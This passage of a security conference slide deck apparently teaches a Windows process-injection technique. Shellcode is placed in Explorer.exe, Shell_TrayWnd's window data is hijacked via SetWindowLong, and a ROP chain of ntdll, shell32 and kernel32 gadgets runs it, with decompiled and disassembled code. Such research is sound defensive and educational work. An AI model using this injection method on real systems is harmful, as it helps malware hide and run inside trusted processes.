[Diagram: Malware.exe uses VirtualAllocEx() & WriteProcessMemory() to place Shellcode and a Fake Memory Layout (+0 lParam (this), +4 hWnd) inside Explorer.exe]

Slide 141

Slide 141 text

[Diagram: WriteProcessMemory() fills the Fake Memory Layout: +0 → Shellcode address, +4 → pointer to +0]

Slide 142

Slide 142 text

[Diagram: SetWindowLong() rewrites Shell_TrayWnd's +0 to point at (Fake Memory + 4)]

Slide 143

Slide 143 text

[Diagram: SendMessage, SendNotifyMessage or PostMessage to Shell_TrayWnd triggers its window procedure with the fake layout in place]

Slide 144

Slide 144 text

Slide 145

Slide 145 text

PowerLoadEx

Slide 146

Slide 146 text

Slide 147

Slide 147 text

int s_WndProc(HWND hWnd, DWORD Msg, DWORD wParam, DWORD lParam) {
    /* ... Initialization for Window ... */
    /* Deal with normal Window Event */
    DWORD wndSelf = GetWindowLongW(hWnd, 0);
    DWORD lParama;
    if (wndSelf) {
        /* InterlockedIncrement */
        (void(*)())*wndSelf(wndSelf);
        /* Custom WndProc */
        lParama = (*wndSelf + 0x08)(wndSelf, hWnd, Msg, wParam, lParam);
        if (Msg == WM_NCDESTROY) {
            SetWindowLongW(hWnd, 0, 0);
            *(wndSelf + 0x04) = 0;
        }
        /* Destroy Task */
        (void(*)())(*wndSelf + 0x04)(wndSelf);
    } else
        lParama = SHDefWindowProc(hWnd, Msg, wParam, lParam);
    return lParama;
}

Slide 148

Slide 148 text

We Have Three Chances!

    /* InterlockedIncrement */
    (void(*)())*wndSelf(wndSelf);
    /* Custom WndProc */
    lParama = (*wndSelf + 0x08)(wndSelf, hWnd, Msg, wParam, lParam);
    if (Msg == WM_NCDESTROY) {
        SetWindowLongW(hWnd, 0, 0);
        *(wndSelf + 0x04) = 0;
    }
    /* Destroy Task */
    (void(*)())(*wndSelf + 0x04)(wndSelf);

Slide 149

Slide 149 text

[Diagram: Explorer.exe's Window A (Window Class: +0 lParam (vtable), +4 hWnd) and Malware.exe's view of the same Window A]

Slide 150

Slide 150 text

[Diagram: Windows A, B and C owned by Explorer.exe, each mirrored in Malware.exe]

Slide 151

Slide 151 text

[Diagram: Explorer.exe's Shell_TrayWnd (+0 lParam (vtable), +4 hWnd) and Window A; Malware.exe prepares a Fake Memory Layout for Window A]

Slide 152

Slide 152 text

[Diagram: Fake Memory Layout for Window A: +0 lParam (vtable), +4 hWnd, then +8, +16, +24 ... pointing at the Shellcode]

Slide 153

Slide 153 text

We have three arbitrary EIP points, but... the memory of the window struct is mapped read/write only (RW), not executable.

Slide 154

Slide 154 text

ROP! Return-oriented programming

Slide 155

Slide 155 text

"Ah, it looks like a chessboard." "I think it looks more like manuscript paper," I said. "It looks just like squares of mung-bean cake," a classmate nicknamed "the Big Eater" chimed in right away. (from 雅量, "Magnanimity")

Slide 156

Slide 156 text

Bytes: 35 31 c0 90 c3

Decoded from the first byte:
  0: 35 31 c0 90 c3   xor eax, 0xc390c031

Decoded from the second byte:
  0: 31 c0            xor eax, eax
  2: 90               nop
  3: c3               ret

Slide 157

Slide 157 text

ROP is a very magnanimous thing. –aaaddress1

Slide 158

Slide 158 text

[Diagram: Explorer.exe stack holding 0xdead, 0xbeef, 0xcafe; execution begins at "somewhere: ret"]
0xdead: xor eax, eax ; ret
0xbeef: inc al ; ret
0xcafe: push eax ; ret

Slide 159

Slide 159 text

But we cannot control the data on the stack, so how do we make a ROP chain work?

Slide 160

Slide 160 text

#1 Chance: (void(*)())*wndSelf(wndSelf);

.text:00412015 mov  ebx, [ebp+hWnd]
.text:00412018 push 0                    ; nIndex
.text:0041201A push ebx                  ; hWnd
.text:0041201B call GetWindowLongW(x,x)
.text:00412021 mov  esi, eax
.text:0041202B mov  eax, [esi]
.text:0041202D push esi
.text:0041202E call dword ptr [eax]

We can set it to point to ntdll!KiUserApcDispatcher().

Slide 161

Slide 161 text

.text:77F06F98 _KiUserApcDispatcher@16 proc near
.text:77F06F98 lea  eax, [esp+arg_2D8]
.text:77F06F9F mov  ecx, large fs:0
.text:77F06FA6 mov  edx, _KiUserApcExceptionHandler
.text:77F06FAB mov  [eax], ecx
.text:77F06FAD mov  [eax+4], edx
.text:77F06FB0 mov  large fs:0, eax
.text:77F06FB6 pop  eax
.text:77F06FB7 lea  edi, [esp-4+Context]
.text:77F06FBB call eax
.text:77F06FBD mov  ecx, [edi+2CCh]
.text:77F06FC3 mov  large fs:0, ecx
.text:77F06FCA push 1                    ; TestAlert
.text:77F06FCC push edi                  ; Context
.text:77F06FCD call _ZwContinue@8
.text:77F06FD2 mov  esi, eax

Slide 162

Slide 162 text

#2 Chance: (*wndSelf+0x08)(x, x, x, x, x);

.text:00412030 push [ebp+arg_C]
.text:00412033 mov  eax, [esi]
.text:00412035 push [ebp+wParam]
.text:00412038 mov  ecx, esi
.text:0041203A push edi
.text:0041203B push ebx
.text:0041203C call dword ptr [eax+8]

We can set it to point to a gadget.

Slide 163

Slide 163 text

#2 Chance: (*wndSelf+0x08)(x, x, x, x, x);

SHELL32:75C82511 std
SHELL32:75C82512 ret

Sets the direction flag (DF) = 1; from now on MOVS instructions decrement ESI/EDI on every operation.

Slide 164

Slide 164 text

#3 Chance: (void(*)())(*wndSelf+0x04)(wndSelf);

.text:0041204E mov  eax, [esi]
.text:00412050 push esi
.text:00412051 call dword ptr [eax+4]

Slide 165

Slide 165 text

#3 Chance: (void(*)())(*wndSelf+0x04)(wndSelf);

SHELL32:75C80915 mov  ecx, 94h
SHELL32:75C8091A rep movsd
SHELL32:75C8091C pop  edi
SHELL32:75C8091D xor  eax, eax
SHELL32:75C8091F pop  esi
SHELL32:75C80920 pop  ebp
SHELL32:75C80921 retn 8

Copies 0x94 * sizeof(DWORD) bytes from ESI (window memory) to EDI (stack memory).

Slide 166

Slide 166 text

#3 Chance: (void(*)())(*wndSelf+0x04)(wndSelf);

SHELL32:75C80915 mov  ecx, 94h
SHELL32:75C8091A rep movsd
SHELL32:75C8091C pop  edi
SHELL32:75C8091D xor  eax, eax
SHELL32:75C8091F pop  esi
SHELL32:75C80920 pop  ebp
SHELL32:75C80921 retn 8

Copies 0x94 * sizeof(DWORD) bytes from ESI (window memory) to EDI (stack memory). Stack controllable! Control the return address: #4 Chance!

Slide 167

Slide 167 text

SHELL32:75C80915 mov  ecx, 94h
SHELL32:75C8091A rep movsd
SHELL32:75C8091C pop  edi
SHELL32:75C8091D xor  eax, eax
SHELL32:75C8091F pop  esi
SHELL32:75C80920 pop  ebp
SHELL32:75C80921 retn 8

kernel32!7568E0E0 cld
kernel32!7568E0E1 retn

ntdll!7730289D:
    pop  eax
    retn

#4 Chance
ntdll!alloca_probe:
    push ecx
    lea  ecx, [esp+4]
    sub  ecx, eax
    ...
    retn

Out of stack memory: allocate local stack space via alloca_probe().

Slide 168

Slide 168 text

#4 Chance

ntdll!_chkstk (alloca_probe):
    push ecx
    lea  ecx, [esp+4]
    sub  ecx, eax
    ...
    retn

kernel32!WriteProcessMemory:
    mov  edi, edi
    push ebp
    mov  ebp, esp
    pop  ebp
    ...
    retn

ntdll!atan:
    ... Shellcode ...

Stack:
xxxx24  772BE4A6  (return)
xxxx28  FFFFFFFF  (current process)
xxxx2C  772D48C0  (ntdll!atan)
xxxx30  007F1408  (shellcode)
xxxx34  00000070  (byte count)
xxxx38  00000000  (null)

Slide 169

Slide 169 text

Slide 170

Slide 170 text

Facebook: 馬聖豪 Twitter: @aaaddress1 Email: [email protected] PoC: github.com/aaaddress1/winInject101 Thanks!